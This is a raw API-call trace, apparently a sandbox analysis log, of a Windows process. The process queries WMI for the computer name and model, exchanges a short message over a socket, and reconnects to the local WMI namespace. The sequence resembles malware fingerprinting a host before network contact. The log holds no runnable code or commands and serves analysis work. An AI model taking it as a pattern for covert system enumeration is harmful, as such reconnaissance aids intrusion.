	[0200.901] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0200.901] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0200.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0200.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.901] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__CLASS", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0200.902] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.902] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__CLASS", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0200.902] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.902] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0200.902] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0200.902] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.902] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0200.902] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0200.902] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.902] IWbemClassObject:GetNames (in: This=0x1cc3c960, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cce8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cce0 | out: pNames=0x1c68cce0*="\x01ƀ\x08") returned 0x0
	[0200.902] SafeArrayGetDim (psa=0x1b88af50) returned 0x1
	[0200.903] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__GENUS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.903] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__CLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.903] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.903] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.903] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.903] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.904] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__RELPATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.904] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0200.904] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.904] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b88af50*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b88a2a0, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c68ccdc*=8200, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.904] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__SERVER", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.904] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0200.904] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.904] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.904] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="__PATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0200.904] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0200.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cd80 | out: puCount=0x1c68cd80*=0x2) returned 0x0
	[0200.905] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd80*=0x17, pszText=0x0) returned 0x0
	[0200.905] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.905] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="Model", lFlags=0, pVal=0x1c68cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd6c*=0, plFlavor=0x1c68cd68*=0 | out: pVal=0x1c68cd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x1c68cd6c*=8, plFlavor=0x1c68cd68*=32) returned 0x0
	[0200.905] SysStringLen (param_1="M5X0JE") returned 0x6
	[0200.905] IWbemClassObject:Get (in: This=0x1cc3c960, wszName="Model", lFlags=0, pVal=0x1c68cfa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cf9c*=8, plFlavor=0x1c68cf98*=32 | out: pVal=0x1c68cfa0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x1c68cf9c*=8, plFlavor=0x1c68cf98*=32) returned 0x0
	[0200.905] SysStringLen (param_1="M5X0JE") returned 0x6
	[0200.906] send (s=0x408, buf=0x2fa9428*, len=26, flags=0) returned 26
	[0200.907] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 136
	[0200.913] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0200.915] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0200.915] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0200.915] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0200.915] IUnknown:Release (This=0x221868) returned 0x1
	[0200.916] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc31b40) returned 0x0
	[0200.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31b40, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0200.916] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31b40, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc35ba0) returned 0x0
	[0200.917] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ba0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc35ba0) returned 0x0
	[0200.917] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ba0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0200.917] WbemDefPath:IUnknown:AddRef (This=0x1cc35ba0) returned 0x3
	[0200.917] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
	[0200.917] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ba0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b886e30) returned 0x0
	[0200.917] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b886e30, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.917] WbemDefPath:IUnknown:Release (This=0x1b886e30) returned 0x3
	[0200.918] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0200.918] WbemDefPath:IUnknown:AddRef (This=0x1cc35ba0) returned 0x4
	[0200.918] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ba0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0200.918] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x3
	[0200.918] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x2
	[0200.918] WbemDefPath:IUnknown:Release (This=0x1cc31b40) returned 0x0
	[0200.918] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x1
	[0200.918] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0200.918] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0200.918] WbemDefPath:IUnknown:AddRef (This=0x1cc35ba0) returned 0x2
	[0200.918] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ba0, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc35ba0) returned 0x0
	[0200.919] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x2
	[0200.919] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x1
	[0200.919] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0200.919] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0200.919] WbemDefPath:IUnknown:AddRef (This=0x1cc35ba0) returned 0x2
	[0200.919] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc35ba0, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc35ba0) returned 0x0
	[0200.919] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x2
	[0200.919] WbemDefPath:IUnknown:AddRef (This=0x1cc35ba0) returned 0x3
	[0200.919] WbemDefPath:IWbemPath:SetText (This=0x1cc35ba0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.919] WbemDefPath:IUnknown:Release (This=0x1cc35ba0) returned 0x2
	[0200.919] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0200.919] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0200.919] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.920] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0200.920] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0200.920] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.920] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0200.920] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0200.920] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0200.920] IUnknown:Release (This=0x221868) returned 0x1
	[0200.920] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc31be0) returned 0x0
	[0200.920] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31be0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0200.920] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc31be0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc31c00) returned 0x0
	[0200.921] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31c00, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc31c00) returned 0x0
	[0200.921] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31c00, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0200.921] WbemLocator:IUnknown:AddRef (This=0x1cc31c00) returned 0x3
	[0200.921] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0200.921] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31c00, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0200.921] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0200.921] WbemLocator:IUnknown:AddRef (This=0x1cc31c00) returned 0x4
	[0200.921] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31c00, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0200.922] WbemLocator:IUnknown:Release (This=0x1cc31c00) returned 0x3
	[0200.922] WbemLocator:IUnknown:Release (This=0x1cc31c00) returned 0x2
	[0200.922] WbemLocator:IUnknown:Release (This=0x1cc31be0) returned 0x0
	[0200.922] WbemLocator:IUnknown:Release (This=0x1cc31c00) returned 0x1
	[0200.922] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0200.922] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0200.922] WbemLocator:IUnknown:AddRef (This=0x1cc31c00) returned 0x2
	[0200.922] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31c00, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc31c00) returned 0x0
	[0200.922] WbemLocator:IUnknown:Release (This=0x1cc31c00) returned 0x2
	[0200.922] WbemLocator:IUnknown:Release (This=0x1cc31c00) returned 0x1
	[0200.922] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc35ba0, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0200.922] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0200.923] WbemDefPath:IWbemPath:GetText (in: This=0x1cc35ba0, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.923] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc31c20) returned 0x0
	[0200.923] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc31c20, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc3aad8) returned 0x0
	[0201.805] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aad8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86e820) returned 0x0
